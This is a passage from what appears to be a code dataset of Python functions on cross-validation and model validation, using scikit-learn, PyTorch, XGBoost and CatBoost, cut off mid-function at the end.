crossValidate(self, args):\n\n ##################################\n # Read the training data\n ##################################\n if not os.path.isdir(args.annotationPath):\n print('annotation path does not exist: {}' \\\n .format(args.annotationPath))\n return -1\n\n data = self.readData(args.annotationPath)\n\n ############################\n # Execute the K-Fold cross validation\n ############################\n\n x = []\n y = []\n l = []\n for subject, df in data.items():\n lx = df[['gradient', 'rate']].values.tolist()\n #lx = df[['rate']].values.tolist()\n ly = np.array(df[['immersion']].values.tolist()).squeeze(-1)\n x.extend(lx)\n y.extend(ly.tolist())\n l.append(len(lx))\n\n x = np.array(x)\n y = np.array(y)\n\n print('Executing cross-validation with k = {}...'.format(args.k))\n clf = StructuredPerceptron(random_state=2)\n scores = []\n folds = SequenceKFold(l, n_folds=args.k)\n for train_idx, train_len, test_idx, test_len in folds:\n xTrain = x[train_idx]\n yTrain = y[train_idx]\n clf.fit(xTrain, yTrain, train_len)\n\n xTest = x[test_idx]\n yTest = y[test_idx]\n yPred = clf.predict(xTest, test_len)\n scores.append(accuracy_score(yTest, yPred))\n\n scores = np.array(scores)\n print(scores)\n print('Result of the K-Fold CV: {:3f} (+- {:3f})' \\\n .format(scores.mean(), 2 * scores.std()))\n\n ############################\n # Execute the Leave-One-Out cross validation\n ############################\n\n\n return 0", "def crossvalidate(*args, **kwargs):\n\n scores = []\n j = 0\n for i, _ in enumerate(data):\n if i in good_patients:\n\n if 'silent' in kwargs:\n if kwargs['silent']:\n pass\n else:\n print \"real patient index:\", i\n else:\n print \"real patient index:\", i\n\n 
kwargs['patient_index'] = j\n score, reconstruction = runmodel(*args, **kwargs)\n scores.append(score)\n\n if 'save_reconstruction' in kwargs:\n if kwargs['save_reconstruction']:\n scipy.misc.imsave(\"patient_{}_reconstruction.png\".format(i), reconstruction)\n j += 1\n\n cvmodel = args[0].__class__.__name__\n print \"{} overall cross validated score {}\".format(cvmodel, np.mean(scores))\n return np.mean(scores)", "def _cross_validate(self, fit_params={}):\n\n # Flatten the true labels for the training data\n y_train = self.y_train.values if self.y_train.shape[1] > 1 else self.y_train.values.ravel()\n\n if self.model.estimator_type == \"classifier\":\n\n # Get unique labels for classification\n labels = np.unique(y_train)\n\n # Set up a dictionary for the scoring metrics\n scoring = {'accuracy':'accuracy'}\n\n # Prepare arguments for the scorers\n metric_args = self.model.metric_args\n \n if 'average' in metric_args and metric_args['average'] is not None:\n # If the score is being averaged over classes a single scorer per metric is sufficient\n scoring['precision'] = metrics.make_scorer(metrics.precision_score, **metric_args)\n scoring['recall'] = metrics.make_scorer(metrics.recall_score, **metric_args)\n scoring['fscore'] = metrics.make_scorer(metrics.f1_score, **metric_args)\n\n output_format = \"clf_overall\"\n else:\n # If there is no averaging we will need multiple scorers; one for each class\n for label in labels:\n metric_args['pos_label'] = label\n metric_args['labels'] = [label]\n scoring['precision_'+str(label)] = metrics.make_scorer(metrics.precision_score, **metric_args)\n scoring['recall_'+str(label)] = metrics.make_scorer(metrics.recall_score, **metric_args)\n scoring['fscore_'+str(label)] = metrics.make_scorer(metrics.f1_score, **metric_args)\n \n output_format = \"clf_classes\"\n\n elif self.model.estimator_type == \"regressor\":\n scoring = ['r2', 'neg_mean_squared_error', 'neg_mean_absolute_error', 'neg_median_absolute_error', 'explained_variance']\n \n # Perform cross validation using the training data and the model pipeline\n scores = cross_validate(self.model.pipe, self.X_train, y_train, scoring=scoring, cv=self.model.cv, fit_params=fit_params, return_train_score=False)\n\n # Prepare the metrics data frame according to the output format\n if self.model.estimator_type == \"classifier\": \n # Get cross validation predictions for the confusion matrix\n y_pred = cross_val_predict(self.model.pipe, self.X_train, y_train, cv=self.model.cv, fit_params=fit_params)\n\n # Prepare the confusion matrix and add it to the model\n self._prep_confusion_matrix(y_train, y_pred, labels)\n\n # Create an empty data frame to set the structure\n metrics_df = pd.DataFrame(columns=[\"class\", \"accuracy\", \"accuracy_std\", \"precision\", \"precision_std\", \"recall\",\\\n \"recall_std\", \"fscore\", \"fscore_std\"])\n\n if output_format == \"clf_overall\": \n # Add the overall metrics to the data frame\n metrics_df.loc[0] = [\"overall\", np.average(scores[\"test_accuracy\"]), np.std(scores[\"test_accuracy\"]),\\\n np.average(scores[\"test_precision\"]), np.std(scores[\"test_precision\"]),\\\n np.average(scores[\"test_recall\"]), np.std(scores[\"test_recall\"]),\\\n np.average(scores[\"test_fscore\"]), np.std(scores[\"test_fscore\"])]\n\n elif output_format == \"clf_classes\":\n # Add accuracy which is calculated at an overall level\n metrics_df.loc[0] = [\"overall\", np.average(scores[\"test_accuracy\"]), np.std(scores[\"test_accuracy\"]),\\\n np.NaN, np.NaN, np.NaN, np.NaN, np.NaN, 
np.NaN]\n\n # Add the metrics for each class to the data frame\n for i, label in enumerate(labels):\n metrics_df.loc[i+1] = [label, np.NaN, np.NaN, np.average(scores[\"test_precision_\"+str(label)]),\\\n np.std(scores[\"test_precision_\"+str(label)]), np.average(scores[\"test_recall_\"+str(label)]),\\\n np.std(scores[\"test_recall_\"+str(label)]), np.average(scores[\"test_fscore_\"+str(label)]),\\\n np.std(scores[\"test_fscore_\"+str(label)])]\n \n # Finalize the structure of the result DataFrame\n metrics_df.loc[:,\"model_name\"] = self.model.name\n metrics_df = metrics_df.loc[:,[\"model_name\", \"class\", \"accuracy\", \"accuracy_std\", \"precision\", \"precision_std\", \"recall\",\\\n \"recall_std\", \"fscore\", \"fscore_std\"]]\n\n # Add the score to the model\n self.model.score = metrics_df[\"accuracy\"].values[0]\n\n elif self.model.estimator_type == \"regressor\":\n # Create an empty data frame to set the structure\n metrics_df = pd.DataFrame(columns=[\"r2_score\", \"r2_score_std\", \"mean_squared_error\", \"mean_squared_error_std\",\\\n \"mean_absolute_error\", \"mean_absolute_error_std\", \"median_absolute_error\", \"median_absolute_error_std\",\\\n \"explained_variance_score\", \"explained_variance_score_std\"])\n \n # Add the overall metrics to the data frame\n metrics_df.loc[0] = [np.average(scores[\"test_r2\"]), np.std(scores[\"test_r2\"]),\\\n np.average(scores[\"test_neg_mean_squared_error\"]), np.std(scores[\"test_neg_mean_squared_error\"]),\\\n np.average(scores[\"test_neg_mean_absolute_error\"]), np.std(scores[\"test_neg_mean_absolute_error\"]),\\\n np.average(scores[\"test_neg_median_absolute_error\"]), np.std(scores[\"test_neg_median_absolute_error\"]),\\\n np.average(scores[\"test_explained_variance\"]), np.std(scores[\"test_explained_variance\"])]\n \n # Finalize the structure of the result DataFrame\n metrics_df.loc[:,\"model_name\"] = self.model.name\n metrics_df = metrics_df.loc[:,[\"model_name\", \"r2_score\", \"r2_score_std\", \"mean_squared_error\", \"mean_squared_error_std\",\\\n \"mean_absolute_error\", \"mean_absolute_error_std\", \"median_absolute_error\", \"median_absolute_error_std\",\\\n \"explained_variance_score\", \"explained_variance_score_std\"]]\n\n # Add the score to the model\n self.model.score = metrics_df[\"r2_score\"].values[0]\n\n # Save the metrics_df to the model\n self.model.metrics_df = metrics_df", "def main(args):\n dataset = MelSpectrogramDataset(args.dataset_file, args.label_file,\n args.context, None, device, None)\n\n # Split train and test datasets\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n train_dataset, test_dataset = torch.utils.data.random_split(\n dataset, [train_size, test_size])\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n validation_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n\n model = get_model(args.model_name, dataset.vector_length).to(device)\n\n optimizer = getattr(torch.optim, args.optimizer)(model.parameters(),\n lr=args.lr,\n weight_decay=args.wd)\n\n loss_func = F.cross_entropy\n\n training_loss = []\n # Train\n for epoch in tqdm(range(args.num_epochs)):\n\n loss_epoch = []\n\n for input_vector, label in train_loader:\n label = label.to(dtype=torch.long,\n device=device,\n non_blocking=False)\n\n input_vector = input_vector.to(device, non_blocking=False)\n input_vector = 
input_vector.float()\n\n pred = model(input_vector).transpose(1, 2)\n\n optimizer.zero_grad()\n\n loss = loss_func(pred, label)\n\n loss.backward()\n\n optimizer.step()\n\n loss_epoch.append(loss.item())\n\n print(f\"Loss at epoch {epoch} is {sum(loss_epoch)/len(loss_epoch)}\")\n training_loss.append(sum(loss_epoch) / len(loss_epoch))\n validation_losses = validate(args, model, loss_func, validation_loader)\n\n # Graph training loss\n y_loss = np.array(training_loss)\n x_epochs = np.arange(1, len(y_loss) + 1)\n sns.set()\n loss_plot = sns.lineplot(x=x_epochs, y=y_loss)\n loss_plot.set(xlabel='Epoch', ylabel='Cross Entropy Loss')\n plt.title('Training Loss')\n plt.show()", "def validate(model, dataloader):\n model.eval()\n device = model.device \n epoch_start = time.time() \n running_loss = 0.0\n running_accuracy = 0.0 \n all_prob, all_labels = [], []\n\n with torch.no_grad():\n for (batch_seqs, batch_seq_masks, batch_seq_segments, batch_labels) in dataloader:\n seqs = batch_seqs.to(device) \n masks = batch_seq_masks.to(device)\n segments = batch_seq_segments.to(device)\n labels = batch_labels.to(device)\n \n loss, logits, probabilities = model(seqs, masks, segments, labels)\n running_loss += loss.item()\n running_accuracy += correct_predictions(probabilities, labels)\n \n all_prob.extend(probabilities[:, 1].cpu().numpy())\n all_labels.extend(batch_labels)\n epoch_time = time.time() - epoch_start \n epoch_loss = running_loss / len(dataloader)\n epoch_accuracy = running_accuracy / (len(dataloader.dataset))\n # epoch_f1 = epoch_accuracy \n return epoch_time, epoch_loss, epoch_accuracy, roc_auc_score(all_labels, all_prob),", "def cross_validate(model, X, y, folds=5, epochs=5, batch_size=32, callbacks=None, shuffle=False, random_state=None):\n\n # Initalize KFold\n kfolds = KFold(n_splits=folds, random_state=random_state, shuffle=shuffle)\n all_metrics = []\n\n # To build the model\n if type(model).__name__ == 'SVDpp':\n model.implicit_feedback(X[:10, :])\n model(X[:10, :])\n\n # Workaround to reset weights after each fold fit\n weights = model.get_weights()\n i = 1\n\n for train, val in kfolds.split(X, y):\n\n # Gather implicit feedback if model is SVD++\n if type(model).__name__ == 'SVDpp':\n model.implicit_feedback(X[train])\n\n print(f'\\nFitting on Fold {i}')\n # Train and evaluate metrics\n history = model.fit(\n X[train], y[train], batch_size=batch_size, epochs=epochs, callbacks=callbacks)\n print(f'\\nEvaluating on Fold {i}')\n fold_score = history.model.evaluate(X[val], y[val])\n all_metrics.append(fold_score)\n\n # Reset Weights\n model.set_weights(weights)\n\n i += 1\n\n all_metrics = np.array(all_metrics)\n\n for i, metric in enumerate(model.metrics_names):\n print(f'Mean {metric.capitalize()} : {np.mean(all_metrics.T[i])}')\n\n return all_metrics", "def cross_valid(model,x,folds,metric,verbose=True): \r\n\r\n score=[]\r\n \r\n\r\n kf = KFold(folds,shuffle=False,random_state=0) \r\n\r\n\r\n i=0\r\n for train_index, test_index in kf.split(x):\r\n\r\n xtrain = x[train_index,:]\r\n xtest = x[test_index,:]\r\n\r\n model.fit(xtrain[:,:-1],xtrain[:,-1])\r\n\r\n ypred = model.predict(xtest[:,:-1])\r\n\r\n ytrue= xtest[:,-1] \r\n \r\n \r\n if metric == 'mae':\r\n score.append(mae(ytrue,ypred))\r\n elif metric == 'mse':\r\n score.append(mse(ytrue,ypred))\r\n elif metric == 'rrmse':\r\n score.append(rrmse(ytrue,ypred))\r\n\r\n else:\r\n score.append(rmse(xtest[:,-1],ypred))\r\n\r\n if verbose:\r\n print('-'*30)\r\n print(f'\\nFold {i+1} out of {folds}')\r\n print(f'{metric}: 
{score[i]}')\r\n\r\n i+=1\r\n\r\n if verbose:\r\n print(f'\\n Overall Score:')\r\n print(f'{metric}: Mean: {np.mean(score)} Std: {np.std(score)}')\r\n\r\n\r\n return score", "def validate(self):\n\n # start validate\n self.model.eval()\n preds, labels = [], []\n for batch_idx, data in enumerate(self.valid_dataloader):\n # calculate and log losses\n losses_report, valid_preds, valid_labels = self.forward_one_batch(\n data)\n self._update_losses(losses_report, train=False)\n\n preds.append(valid_preds)\n labels.append(valid_labels)\n\n preds = np.concatenate(preds, axis=0)\n labels = np.concatenate(labels, axis=0)\n if IS_REG:\n preds = disc(preds)\n # calculate and log metrics\n metrics_report = self.evaluate_metrics(preds, labels)\n self._update_metrics(metrics_report, train=False)\n\n # TODO: lr scheduler step setting\n self.lr_scheduler.step(self.valid_loss_meters['CrossEntropyLoss'].avg)\n\n # end validate\n self.model.train()", "def cross_validate(X, Y, folds=5):\n\n log = LogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,\n intercept_scaling=1, max_iter=200, multi_class='ovr', n_jobs=3,\n penalty='l2', random_state=None, solver='liblinear', tol=0.0001,\n verbose=0, warm_start=False)\n \n\n \n\n\n scores_log = [] \n scores_forest = []\n index = np.arange(X.shape[0])\n score_log = 0\n score_forest = 0\n \n for i in range(folds):\n score_log = 0\n score_forest = 0\n \n test_index = np.random.choice(index, int(X.shape[0]*1/folds),replace=False)\n index = np.setdiff1d(np.arange(X.shape[0]),test_index)\n \n test_x = X[test_index]\n test_y = Y[test_index]\n\n log.fit(X[index],Y[index])\n pred_log = log.predict(test_x)\n \n ran.fit(X[index],Y[index])\n pred_ran = ran.predict(test_x)\n \n for i in range(len(test_y)):\n if(pred_log[i] == test_y[i]):\n score_log += 1\n if(pred_ran[i] == test_y[i]):\n score_forest += 1\n scores_log.append(score_log/len(test_y))\n scores_forest.append(score_forest/len(test_y))\n \n\n return (np.mean(scores_log),np.mean(scores_forest))", "def LOSO_cross_validation(signal, device):\n rf = RandomForestClassifier(random_state=0)\n hyperparams = {\"n_estimators\": [30, 50, 100], \"max_depth\": [10, 30, 50]}\n clf = GridSearchCV(estimator=rf, param_grid=hyperparams, scoring=\"accuracy\", cv=None, refit=True, verbose=0)\n\n all_subjects_but_one = []\n for subject_out in range(0, 51):\n for subject_in in range(0, 51):\n if subject_in == subject_out:\n print(f'Leaving subject {subject_out} out: \\n ==================================================')\n else:\n _, _, _, _, normalized_all_feature, all_labels = input_features_labels(device=device,\n signal=signal,\n subject_ID=subject_in)\n feature_label = pd.concat([normalized_all_feature, all_labels], axis=1)\n all_subjects_but_one.append(feature_label)\n\n all_subjects_but_one = pd.concat(all_subjects_but_one, axis=0)\n all_subjects_but_one = all_subjects_but_one.dropna()\n feature_train = all_subjects_but_one.drop(columns=['Activity_ID'])\n label_train = all_subjects_but_one['Activity_ID']\n print(feature_train)\n print(label_train)\n\n _, _, _, _, feature_test, label_test = input_features_labels(device=device,\n signal=signal, subject_ID=subject_out)\n print(feature_test)\n print(label_test)\n clf.fit(feature_train, label_train)\n print('Best parameters: ', clf.best_params_)\n prediction = clf.predict(feature_test)\n report = sklearn.metrics.classification_report(label_test, prediction, digits=3, zero_division=1)\n\n conf_matrix = confusion_matrix(label_test, prediction)\n 
print(conf_matrix.shape[0])\n # plotitng_confusion_matrix(confusion_matrix=con_matrix, evaluation_mode='personal', subject_ID=subject_ID)\n print(report)\n for row in range(conf_matrix.shape[0]):\n print(f'Accuracy for class {row}: ',\n accuracy_per_class(conf_matrix=conf_matrix, row_index=row, to_print=False))\n\n all_subjects_but_one = []", "def do_cross_val(sem, data_desc, perf_ml_model, ml_model_desc, ml_model, train_feature,\n train_result):\n scores = cross_val_score(ml_model, train_feature, train_result, cv = NUM_KFOLD,\n scoring = 'neg_mean_absolute_error')\n if VERB: \n print(\"model: %s - score: %f\" % (ml_model_desc, statistics.mean(scores)))\n perf_ml_model[(sem, data_desc, ml_model_desc)] = statistics.mean(scores)", "def cross_validate(self, pre_train=None, **kwargs):\n \n inferred = np.nan * np.ones_like(self.labels_array)\n N_training_set, N_labels = inferred.shape\n N_stop_at = kwargs.pop(\"N\", N_training_set)\n\n debug = kwargs.pop(\"debug\", False)\n \n kwds = { \"threads\": self.threads }\n kwds.update(kwargs)\n\n for i in range(N_training_set):\n \n training_set = np.ones(N_training_set, dtype=bool)\n training_set[i] = False\n\n # Create a clean model to use so we don't overwrite self.\n model = self.__class__(\n self.training_labels[training_set],\n self.training_fluxes[training_set],\n self.training_flux_uncertainties[training_set],\n **kwds)\n\n # Initialise and run any pre-training function.\n for _attribute in self._descriptive_attributes:\n setattr(model, _attribute[1:], getattr(self, _attribute[1:]))\n\n if pre_train is not None:\n pre_train(self, model)\n\n # Train and solve.\n model.train()\n\n try:\n inferred[i, :] = model.fit(self.training_fluxes[i],\n self.training_flux_uncertainties[i], full_output=False)\n\n except:\n logger.exception(\"Exception during cross-validation on object \"\n \"with index {0}:\".format(i))\n if debug: raise\n\n if i == N_stop_at + 1:\n break\n\n return inferred[:N_stop_at, :]", "def crossValidation(data, output_variable_name):\r\n X, xt, y, yt = train_test_split(\r\n data.drop(output_variable_name, axis=1), data[output_variable_name], test_size=0.01, random_state=SEED)\r\n\r\n model = pickle.load(open(\"models/lasso.sav\", 'rb'))\r\n lassoCV = -mean(cross_val_score(model, X, y, cv=5, scoring='neg_root_mean_squared_error'))\r\n\r\n model = pickle.load(open(\"models/ridge.sav\", 'rb'))\r\n ridgeCV = -mean(cross_val_score(model, X, y, cv=5, scoring='neg_root_mean_squared_error'))\r\n\r\n model = pickle.load(open(\"models/decisionTree.sav\", 'rb'))\r\n decTreeCV = -mean(cross_val_score(model, X, y, cv=5, scoring='neg_root_mean_squared_error'))\r\n\r\n param = {\r\n 'max_depth': 15,\r\n 'eta': 0.1,\r\n 'objective': 'reg:squarederror',\r\n 'nthread': 16,\r\n \"subsample\": 0.5,\r\n \"colsample_bytree\": 0.5,\r\n 'eval_metric': 'rmse'\r\n }\r\n num_round = XGB_EPOCH_NR\r\n\r\n dtrain = xgb.DMatrix(X, label=y)\r\n xgbCV = xgb.cv(\r\n param,\r\n dtrain,\r\n num_boost_round=num_round,\r\n seed=SEED,\r\n nfold=5,\r\n metrics={'rmse'}\r\n )[\"test-rmse-mean\"][-1:]\r\n\r\n param = {\r\n \"iterations\": 400,\r\n \"learning_rate\": 0.02,\r\n \"depth\": 12,\r\n \"eval_metric\": 'RMSE',\r\n \"random_seed\": 23,\r\n \"bagging_temperature\": 0.2,\r\n \"od_type\": 'Iter',\r\n \"metric_period\": 75,\r\n \"od_wait\": 100\r\n }\r\n\r\n catBoostCV = cv(data, param, fold_count=5, plot=True)\r\n\r\n return lassoCV, ridgeCV, decTreeCV, xgbCV, catBoostCV", "def __implement_cross_validation(self, X, y, model):\n\n skfolds = StratifiedKFold(n_splits=3, 
random_state=42)\n\n for train_index, test_index in skfolds.split(X, y):\n clone_clf = clone(model)\n X_train_folds = X[train_index]\n y_train_folds = y[train_index]\n X_test_fold = X[test_index]\n y_test_fold = y[test_index]\n\n clone_clf.fit(X_train_folds, y_train_folds)\n y_pred = clone_clf.predict(X_test_fold)\n n_correct = sum(y_pred == y_test_fold)\n message = \"ratio of correct predictions: \", n_correct / len(y_pred)\n self.__logger.info(message)", "def cv(data, folds, model):\n def rmsle(predicted, actual):\n # Root Mean Squared Logarithmic Error\n return mean_squared_error(\n np.log(predicted+1),\n np.log(actual+1)\n ) ** 0.5\n\n errors = []\n print \" Cross Validation in progress...\"\n kf = cross_validation.KFold(n=len(data.index), n_folds=folds)\n for i, (train_index, validation_index) in enumerate(kf):\n print ' F%d.' % i\n train = data.iloc[train_index]\n validation = data.iloc[validation_index]\n\n model.fit(train)\n prediction = model.predict(validation)\n actual = data.iloc[validation_index]['count'].as_matrix()\n error = rmsle(prediction, actual)\n errors.append(error)\n return np.mean(errors)", "def cross_validation(self):\r\n kfold = KFold(10, shuffle=True, random_state=1)\r\n data = self.read_data()\r\n # error from each kth iteration\r\n errors = []\r\n for train, test in kfold.split(data):\r\n\r\n #Splitting into test and training data\r\n X_test, Y_test = data[test][:, 1], data[test][:, 2]\r\n X_train, Y_train = data[train][:, 1], data[train][:, 2]\r\n\r\n #Training on the split data\r\n weights, design_matrix = self.train(X_train, Y_train)\r\n\r\n y_pred = self.make_prediction(X_test, weights)\r\n self.plot(y_true=Y_test, y_pred=y_pred, x=X_test)\r\n\r\n #error matrix\r\n errors.append(np.mean(y_pred - Y_test) ** 2)\r\n\r\n #cross-validation parameter taken as mean of errors obtained from each iteration\r\n print(\"%0.10f mean with a standard deviation of %0.10f across the k-folds\" % (np.mean(errors), np.std(errors)))", "def train_and_score_pipeline(pipeline, automl, full_X_train, full_y_train):\n start = time.time()\n cv_data = []\n logger.info(\"\\tStarting cross validation\")\n X_pd = _convert_woodwork_types_wrapper(full_X_train.to_dataframe())\n y_pd = _convert_woodwork_types_wrapper(full_y_train.to_series())\n y_pd_encoded = y_pd\n # Encode target for classification problems so that we can support float targets. This is okay because we only use split to get the indices to split on\n if is_classification(automl.problem_type):\n y_mapping = {original_target: encoded_target for (encoded_target, original_target) in enumerate(y_pd.value_counts().index)}\n y_pd_encoded = y_pd.map(y_mapping)\n for i, (train, valid) in enumerate(automl.data_splitter.split(X_pd, y_pd_encoded)):\n if pipeline.model_family == ModelFamily.ENSEMBLE and i > 0:\n # Stacked ensembles do CV internally, so we do not run CV here for performance reasons.\n logger.debug(f\"Skipping fold {i} because CV for stacked ensembles is not supported.\")\n break\n logger.debug(f\"\\t\\tTraining and scoring on fold {i}\")\n X_train, X_valid = full_X_train.iloc[train], full_X_train.iloc[valid]\n y_train, y_valid = full_y_train.iloc[train], full_y_train.iloc[valid]\n if is_binary(automl.problem_type) or is_multiclass(automl.problem_type):\n diff_train = set(np.setdiff1d(full_y_train.to_series(), y_train.to_series()))\n diff_valid = set(np.setdiff1d(full_y_train.to_series(), y_valid.to_series()))\n diff_string = f\"Missing target values in the training set after data split: {diff_train}. 
\" if diff_train else \"\"\n diff_string += f\"Missing target values in the validation set after data split: {diff_valid}.\" if diff_valid else \"\"\n if diff_string:\n raise Exception(diff_string)\n objectives_to_score = [automl.objective] + automl.additional_objectives\n cv_pipeline = None\n try:\n logger.debug(f\"\\t\\t\\tFold {i}: starting training\")\n cv_pipeline = EngineBase.train_pipeline(pipeline, X_train, y_train, automl.optimize_thresholds, automl.objective)\n logger.debug(f\"\\t\\t\\tFold {i}: finished training\")\n if automl.optimize_thresholds and pipeline.can_tune_threshold_with_objective(automl.objective) and automl.objective.can_optimize_threshold:\n logger.debug(f\"\\t\\t\\tFold {i}: Optimal threshold found ({cv_pipeline.threshold:.3f})\")\n logger.debug(f\"\\t\\t\\tFold {i}: Scoring trained pipeline\")\n scores = cv_pipeline.score(X_valid, y_valid, objectives=objectives_to_score)\n logger.debug(f\"\\t\\t\\tFold {i}: {automl.objective.name} score: {scores[automl.objective.name]:.3f}\")\n score = scores[automl.objective.name]\n except Exception as e:\n if automl.error_callback is not None:\n automl.error_callback(exception=e, traceback=traceback.format_tb(sys.exc_info()[2]), automl=automl,\n fold_num=i, pipeline=pipeline)\n if isinstance(e, PipelineScoreError):\n nan_scores = {objective: np.nan for objective in e.exceptions}\n scores = {**nan_scores, **e.scored_successfully}\n scores = OrderedDict({o.name: scores[o.name] for o in [automl.objective] + automl.additional_objectives})\n score = scores[automl.objective.name]\n else:\n score = np.nan\n scores = OrderedDict(zip([n.name for n in automl.additional_objectives], [np.nan] * len(automl.additional_objectives)))\n\n ordered_scores = OrderedDict()\n ordered_scores.update({automl.objective.name: score})\n ordered_scores.update(scores)\n ordered_scores.update({\"# Training\": y_train.shape[0]})\n ordered_scores.update({\"# Validation\": y_valid.shape[0]})\n\n evaluation_entry = {\"all_objective_scores\": ordered_scores, \"score\": score, 'binary_classification_threshold': None}\n if is_binary(automl.problem_type) and cv_pipeline is not None and cv_pipeline.threshold is not None:\n evaluation_entry['binary_classification_threshold'] = cv_pipeline.threshold\n cv_data.append(evaluation_entry)\n training_time = time.time() - start\n cv_scores = pd.Series([fold['score'] for fold in cv_data])\n cv_score_mean = cv_scores.mean()\n logger.info(f\"\\tFinished cross validation - mean {automl.objective.name}: {cv_score_mean:.3f}\")\n return {'cv_data': cv_data, 'training_time': training_time, 'cv_scores': cv_scores, 'cv_score_mean': cv_score_mean}", "def cross_validation(feature_train, help_rank_train, model_name):\n clf = svm.SVC(kernel='linear', C=1).fit(feature_train, help_rank_train)\n clf_model = open(model_name,'wb')\n dump(clf, clf_model, -1)\n return", "def sklearn_train() -> None:\n cross_validate(args=SklearnTrainArgs().parse_args(), train_func=run_sklearn)", "def rmsle_cv(model, dataset,y):\r\n kf = KFold(n_folds, shuffle=True, random_state=42).get_n_splits(dataset)\r\n rmse= np.log(-cross_val_score(model, dataset, y, scoring=\"neg_mean_absolute_error\", cv = kf))\r\n return(rmse)", "def cross_validation(exp_name):\n click.echo(\"Mode: Cross-validation.\")\n # defaults = get_defaults()\n\n # fitted_model_filename = add_extension(fitted_model_filename)\n\n # derive final path for fitted model as base output path for fitted models + model filename\n # fitted_model_path = os.path.join(defaults.OUTPUT.FITTED_MODELS_PATH, 
fitted_model_filename)\n # new_options = [\"OUTPUT.FITTED_MODEL_PATH\", fitted_model_path]\n\n # don't reserve dev set at this point since we need to do it in each cv fold\n boot_data = bootstrap(new_options=None, mode=\"cv\")\n\n defaults = boot_data['defaults']\n X_train, y_train = boot_data['data']\n\n cv = RepeatedStratifiedKFold(n_splits=defaults.EVAL.N_SPLITS,\n n_repeats=defaults.EVAL.N_REPEATS,\n random_state=defaults.MISC.SEED)\n\n s = time.time()\n outer_results, outer_preds = cross_validate(X=X_train, y=y_train,\n cv=cv,\n conf=defaults)\n print(\"Execution time: %s seconds.\" % (time.time() - s))\n\n # dump results\n # fitted_model_best_params_path = os.path.join(defaults.OUTPUT.PARAMS_PATH,\n # \"best_params_{}.pkl\".format(fitted_model_filename.split('.')[0]))\n\n outer_results_formatted = show_cross_val_results(outer_results, conf=defaults)\n\n cv_results_path = os.path.join(defaults.OUTPUT.RESULTS_PATH, \"cv_results_{}.csv\".format(exp_name))\n outer_results_formatted.to_csv(cv_results_path)\n\n # save predictions\n outer_preds_path = os.path.join(defaults.OUTPUT.PREDS_PATH, \"cv_pooled_preds_{}.pkl\".format(exp_name))\n save_obj(outer_preds, outer_preds_path)", "def fit_cv(self, train_loader, val_src, val_trg, device):\r\n\r\n val_src = torch.as_tensor(val_src).float()\r\n val_trg = torch.as_tensor(val_trg).float()\r\n\r\n val_src = val_src.to(device)\r\n val_trg = val_trg.to(device)\r\n\r\n optimizer = optim.Adam(self.parameters(), lr=self.learning_rate)\r\n criterion = torch.nn.MSELoss(reduction='mean')\r\n\r\n history = np.zeros((self.num_epochs, 2))\r\n\r\n for epoch in range(self.num_epochs):\r\n self.train()\r\n train_epoch_loss = 0\r\n for i, (src, trg) in enumerate(train_loader):\r\n src = torch.as_tensor(src).float()\r\n src = src.to(device)\r\n trg = torch.as_tensor(trg).float()\r\n trg = trg.to(device)\r\n\r\n train_output = self.forward(src) # 1x197\r\n\r\n loss = criterion(train_output, trg)\r\n\r\n loss.backward()\r\n optimizer.step()\r\n train_epoch_loss += loss.item()\r\n\r\n\r\n # on validation set\r\n self.eval()\r\n val_output = self.forward(val_src)\r\n loss = criterion(val_output, val_trg)\r\n val_epoch_loss = loss.item()\r\n history[epoch] = [train_epoch_loss/(i+1), val_epoch_loss]\r\n\r\n print('Epoch: {}/{} Train Loss: {:.4f} Validation Loss:{:.4f}'\r\n .format(epoch, self.num_epochs, train_epoch_loss/(i+1), val_epoch_loss))\r\n\r\n if train_epoch_loss/(i+1) < self.threshold:\r\n break\r\n\r\n return history[:epoch]", "def train(self):\r\n self.speaker2index_and_index2speaker()\r\n \"\"\"Initialize history matrix\"\"\"\r\n self.history = np.random.normal(loc=0, scale=0.1, size=(len(self.s2i), config.train.class_history))\r\n \"\"\"\"\"\"\r\n \"\"\"\"\"\"\r\n iterations = 0\r\n \"\"\"Get train/test\"\"\"\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"CTC loss\"\"\"\r\n # self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='mean')\r\n self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='none')\r\n for epoch in range(config.train.num_epochs):\r\n \"\"\"Make dataloader\"\"\"\r\n train_data = Dataset({'files': train, 'mode': 
'train', 'metadata_help': metadata_help})\r\n train_gen = data.DataLoader(train_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=train_data.collate, drop_last=True)\r\n val_data = Dataset({'files': val, 'mode': 'train', 'metadata_help': metadata_help})\r\n val_gen = data.DataLoader(val_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=val_data.collate, drop_last=True)\r\n\r\n for batch_number, features in enumerate(train_gen):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n input_lengths = features['input_lengths']\r\n target_lengths = features['target_lengths']\r\n metadata = features[\"metadata\"]\r\n batch_speakers = [x['speaker'] for x in metadata]\r\n self.G = self.G.train()\r\n\r\n #ipdb.set_trace()\r\n \"\"\"Make input_lengths and target_lengths torch ints\"\"\"\r\n input_lengths = input_lengths.to(torch.int32)\r\n target_lengths = target_lengths.to(torch.int32)\r\n phones = phones.to(torch.int32)\r\n\r\n outputs = self.G(spectrograms)\r\n\r\n outputs = outputs.permute(1, 0, 2) # swap batch and sequence length dimension for CTC loss\r\n\r\n loss = self.ctc_loss(log_probs=outputs, targets=phones,\r\n input_lengths=input_lengths, target_lengths=target_lengths)\r\n\r\n \"\"\"Update the loss history\"\"\"\r\n self.update_history(loss, batch_speakers)\r\n if epoch >= config.train.regular_epochs:\r\n loss_weights = 